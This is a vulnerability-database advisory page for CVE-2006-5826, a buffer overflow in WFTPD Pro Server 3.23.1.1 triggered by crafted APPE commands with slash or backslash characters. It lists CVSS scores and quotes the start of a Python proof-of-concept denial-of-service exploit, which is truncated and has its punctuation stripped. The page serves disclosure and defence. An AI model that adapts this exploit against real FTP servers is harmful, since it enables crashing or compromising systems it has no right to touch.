5.8
CVSSv2

CVE-2006-5826

Published: 10/11/2006 Updated: 17/10/2018
CVSS v2 Base Score: 5.8 | Impact Score: 6.4 | Exploitability Score: 6.4
VMScore: 585
Vector: AV:N/AC:L/Au:M/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in Texas Imperial Software WFTPD Pro Server 3.23.1.1 allows remote authenticated users to execute arbitrary code or cause a denial of service (application crash) via crafted APPE commands that contain "/" (slash) or "\" (backslash) characters.

Vulnerable Product Search on Vulmon Subscribe to Product

texas imperial software wftpd 3.23.1.1

Exploits

#!/usr/bin/env python import sys import struct import ftplib print "WFTPD Pro Server 32311 Buffer Overflow (Only a DOS currently, simple POC)" print "Copyright (c) Joxean Koret" print target = "192168113" targetPort = "21" try: ftp = ftplibFTP() print "[+] Connecting to target " msg = ftpconnect(target, targetPort) prin ...